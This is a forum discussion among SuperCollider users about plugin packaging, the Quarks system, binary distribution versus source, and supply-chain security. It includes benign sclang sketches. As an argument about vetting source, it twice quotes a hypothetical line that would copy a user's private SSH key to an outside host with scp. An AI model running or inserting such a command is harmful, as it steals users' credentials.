Moving some SC3Plugins into the "Core"…

… of course, this is up for discussion too. (Probably not here, though!)

This seems like the perfect place to discuss! The question was about moving UGens into core, and Scott seemed to indicate his philosophy was to do the opposite: migrate to a smaller core, splitting UGens out into a Quarks system. (Scott, I hope I’m interpreting this correctly/charitably.)

In my ideal world “the core” UGens would be very minimal, and installing / swapping out UGen sets for different use cases and projects would be very trivial.

I’d also like it to be super-easy to install a set of UGens! (I probably don’t need to sell you on my use-case of easily getting Ambisonics :slight_smile: ). I see a huge value, though, in having a large common UGen vocabulary across the SC community.

Our other disagreement, if there is one, is about how to achieve easy UGen installs. IMO, in a small community like SC, there needs to be some official curation. The solutions that work for languages with person-centuries invested in their package managers seem inappropriate for us. I’m viewing one or more sets of UGens stamped with “the SC devs stand behind these” as being the (mostly) cheap and (mostly) cheerful solution to the problem.

(As Scott points out, sc3-plugins is a major hodgepodge as well. So there’s no panacea. But we should acknowledge the benefits of a process more similar to the status quo.)

It needs a namespace/package system. That and its rigid class system are the two things that annoy me most about the language.


Extensions is a mess. I know nobody wants to ever get rid of stuff in SuperCollider, but my god there are plugins in there that need to be moved to a legacy pack or something. The blackrain ones, most of the ‘analog’ filters, etc. Lots of novelty stuff that’s great if that’s what you’re looking for, but most of us aren’t…

DFM1 is a really good filter, but how is a user supposed to know that’s the one good filter (or that all the Moog filters are bad, and the only decent Moog filters are maintained elsewhere)?

This viewpoint seems to massively overestimate how hard it is to produce a malicious binary. Someone could modify a UGen to do something malicious in a couple hours. Just two of many possible motives: a person with an unusual sense of humor playing a prank, or a developer who’s angry at someone else in the SC community. Not to mention people who compile using a compromised toolchain, etc.

It’s easy to produce a malicious binary, but it’s sufficient work that nobody’s likely to do it in order to try and make money from an obscure music platform.

I’m more worried by literally everything else I’m using, starting with my phone.

Neither example I mentioned has money as a motive, and in the case of an honest developer using a compromised toolchain, the malicious developers need not even have heard of SuperCollider.

Sclang alone is powerful enough to do all sorts of evil things. Do you check the source code of every Quark you install?

How hard would it be to build a ‘pre-parser’ which traverses a piece of code and tells you which quarks and classes outside of vanilla SC are being used? The other day I thought I would do some spring-cleaning of installed quarks, and I spent a long time trying to figure out which quarks I needed to run my code.

In a perfect world (or my perfect world) this pre-parser would list the external quarks and classes in a window, with the option to expand the view to see the method calls used for each external class or quark. The window would have a one-click option to install all the quarks and classes missing to run the code in question, and also the ability to cherry-pick which classes and quarks to install. An extra feature could be revealing where in the code (file & line number) external methods are used. This way it would be easy to see where method calls are used across several connected files.

A very basic version would simply give you a list of missing quarks and classes, without the automated way of installing them and without the specifics about where in the code the methods were called. This would still be very helpful.
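For a rough sense of what that basic version could do, here is a minimal sketch in sclang. Assumptions: the file path is hypothetical, ‘core’ is approximated as anything defined under Platform.resourceDir, and the regex scan is naive (it will also pick up capitalized words inside strings and comments, and it knows nothing about method extensions):

    (
    // Naive sketch: scan a code file for class names, then report
    //   (a) names that don't resolve to any installed class (possibly from missing quarks)
    //   (b) classes whose definitions live outside the SC installation directory
    var path = "~/mycode/piece.scd".standardizePath;   // hypothetical path
    var code = File.readAllString(path);
    var coreDir = Platform.resourceDir;                // treated as "core" here
    var names = code.findRegexp("[A-Z][A-Za-z0-9_]*").collect({ |m| m[1] }).asSet;
    names.do { |name|
        var cls = name.asSymbol.asClass;
        if(cls.isNil) {
            "% : no class with this name is installed".format(name).postln;
        } {
            if(cls.filenameSymbol.asString.beginsWith(coreDir).not) {
                "% : defined outside core, in %".format(name, cls.filenameSymbol).postln;
            };
        };
    };
    )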


I have often wondered why LFBrownNoise0, LFBrownNoise1 and LFBrownNoise2 are not included in the core library… It would be cool if there were a way to use alternatives for these three without sc3-plugins.
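In the meantime, a rough core-only stand-in for LFBrownNoise0 (the non-interpolating one) can be built from a demand-rate Brownian walk. This is only a sketch: the update rate and step size below are made-up defaults rather than a match for the plugin’s behaviour, and there is no interpolation.

    (
    // Brownian low-frequency noise from core UGens: Dbrown generates a random
    // walk, Duty samples it `freq` times per second. No interpolation, so this
    // only roughly mimics LFBrownNoise0.
    var lfBrownish = { |freq = 20, step = 0.125|
        Duty.kr(1 / freq, 0, Dbrown(-1.0, 1.0, step, inf))
    };
    // e.g. wobble a sine's frequency with it
    { SinOsc.ar(440 * (1 + (0.03 * lfBrownish.(16, 0.1)))) * 0.1 }.play;
    )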


QuarkEditor (GitHub - scztt/QuarkEditor.quark) does this, to remind you of quarks you are using but have not installed. It’s meant for finding quark dependencies for another quark, but it could easily be adapted to find dependencies for any given piece of code. It doesn’t search for method extensions, as this is a somewhat hopeless task, though there may still be code in there that tries.


Sweet. Could it also be extended to search for external classes?

Not sure exactly what you mean by “external classes”? If you mean classes from quarks that aren’t currently installed - no, it can’t search, because if you don’t have the classes installed then you can’t compile or run sclang at all. The tool is more for taking an existing, running sclang instance and telling you what explicit quark dependencies you have for a given file / set of classes.
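For what it’s worth, the underlying lookup is plain introspection that anyone can do in a running sclang. A hypothetical illustration (this is not QuarkEditor’s actual API, and ‘Tendency’ is just a placeholder class name):

    (
    // Illustration only: find which installed Quark defines a given class by
    // matching the class's source file path against each Quark's local path.
    var quarkForClass = { |cls|
        var file = cls.filenameSymbol.asString;
        Quarks.installed.detect { |quark| file.beginsWith(quark.localPath) };
    };
    var cls = 'Tendency'.asClass;   // placeholder name; nil if not installed
    if(cls.isNil) {
        "no such class installed here".postln;
    } {
        var quark = quarkForClass.(cls);
        if(quark.notNil) {
            "% comes from the % quark".format(cls.name, quark.name).postln;
        } {
            "% is not provided by an installed quark".format(cls.name).postln;
        };
    };
    )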

Sclang alone is powerful enough to do all sorts of evil things. Do you check the source code of every Quark you install?

Quarks:

  • are open-source
  • have an immutable git history and author information
  • have one version for all CPU architectures and OSes
  • are very unlikely to be accidentally injected with malicious code
  • can actually be vetted, and are inspected regularly, even if not by every user

Binaries:

  • are closed-source
  • don’t necessarily have history or author information
  • are different for every OS+architecture pair
  • are more likely to accidentally contain something malicious
    • so they additionally have plausible deniability (“I didn’t do it, it was my toolchain”)
  • are typically never inspected, and even if someone were to spend a huge amount of time verifying a binary for a given OS+arch pair, their effort would say nothing about any other pair, or any other version of a pair
    • in the worst case, we don’t necessarily know that two downloads of the “same” binary have the same contents

So for Quarks, reputational risk and community vetting carry real weight, as opposed to each person verifying every Quark 100%. E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark it would be likely to be discovered at some point and have great reputational cost for him.

On the other hand, we already have examples of third parties distributing malicious Windows binaries of SuperCollider on third-party sites.

But yes, if the Quarks browser searched the open internet, or if I got a Quark or .scd file in my email from a stranger, I wouldn’t just run it without reading the source, and neither should anyone else.


Aren’t UGens, in general, simple enough for a package manager to just compile locally? Too much to ask of a user?

The level of sophistication in injecting backdoors, even via everyday utilities, is now unprecedented. That’s why a controlled build environment makes much more sense now than ever before.

I know it’s unlikely to happen in this community or in Pd, but everything is unthinkable until it happens. And it can happen without malicious intent on the uploader’s part.

(Of course, using proprietary software, you have that already for free.)

E.g. if James Harkins put a "scp ~/.ssh/id_rsa example.com".unixCmd in a popular ddw* Quark it would be likely to be discovered at some point and have great reputational cost for him.

So you trust his source code, but wouldn’t trust his binaries?

But yes, if the Quarks browser searched the open internet,

That’s of course not how package managers work. In the case of Pd’s Deken package manager, all libraries/externals are stored on a central server (which is hosted at the IEM in Graz). If someone wants to upload a package, they need to register for an account with their e-mail address. Users can see when and by whom a package has been uploaded.


You’re not wrong about the potential security risks of binaries. However, there is a general trade-off between security and convenience. Many users (including myself) are happy to trade some security for convenience.

Reality #1: Audio plugins are generally distributed in binary form. You simply can’t expect casual users to manually build plugins from source.

Reality #2: The sc3-plugins model is not sustainable, and as a consequence the repo has been effectively frozen. There are still occasional bug fixes, but I think it will not accept new plugins. AFAICT, the last new plugin was added 6 years ago. This means that all new plugins must be distributed by the authors themselves.

In practice, UGen plugins are already distributed in binary form. People who want to use VSTPlugin or FluCoMa need to find the website and download the binaries. (Again, only a few users are able or willing to build from source.)

Adding binary support to the Quarks system would finally provide a unified distribution channel. IMO it would be a clear win for both users and plugin authors over the current situation. Of course, there are some technical and logistic questions to be solved, most importantly where and how to host the binaries.
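To make that concrete, here is a purely hypothetical sketch of what a .quark metadata file with platform-specific binary downloads might look like. The binaries field does not exist in the current Quarks system, and the names and URLs are made up; the point is only that the existing metadata format could carry this kind of information.

    (
      name: "MyUGens",                        // hypothetical plugin quark
      summary: "Example UGen plugin pack",
      version: "1.0.0",
      dependencies: [],
      url: "https://example.com/MyUGens",
      // hypothetical field: prebuilt binaries per platform, fetched at install time
      binaries: (
        macos_arm64:  "https://example.com/MyUGens-1.0.0-macOS-arm64.zip",
        windows_x64:  "https://example.com/MyUGens-1.0.0-win64.zip",
        linux_x86_64: "https://example.com/MyUGens-1.0.0-linux-x86_64.zip"
      )
    )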

Also, please note that source code and binaries are not mutually exclusive! For example, Pd encourages packagers to also ship the source code along with the binaries. This way people who don’t want to download binaries can build from source instead.


Side note: Pd’s Deken package manager has been developed and is being maintained by IOhannes zmoelnig. He is, among many other things, sysadmin at the IEM and the Debian packager for Pure Data. He is well aware of all the potential security issues, but he – and the Pd community as a whole – thinks that the benefits outweigh the risks. I would really encourage everyone interested in this topic to have a deeper look.

I’m not saying that the SC community necessarily needs to come to the same conclusions, but I just wanted to challenge the somewhat negative views towards binary distribution.


See also Plugins.quark: A package manager for installing plugins


Very unlikely, but in theory, without an isolated build environment, he could upload malicious software without intent.

When I used Arch, I was pleased that things were much looser in this respect (especially AUR builds). But after the xz backdoor, I think Arch Linux would be the first to spread the backdoor, or some other malicious engineering with that level of sophistication.

I will, and I see your point clearly. But I think Pd needs much more work in this respect, and at the end of the day, it’s the user who should make an informed decision.

xz-utils backdoor situation (CVE-2024-3094) · GitHub

Arch installs binaries. They’re signed, but that wouldn’t protect you from the hypothetical threat above. Most of the computing world relies upon binaries compiled by someone else.

I think people should have the option to compile from source if they want to, and binaries should be signed, but that’s about the limit of what’s practical. There are source-based Unixes (Gentoo, some of the BSDs support this), but most people don’t use them because it takes so long to compile packages.
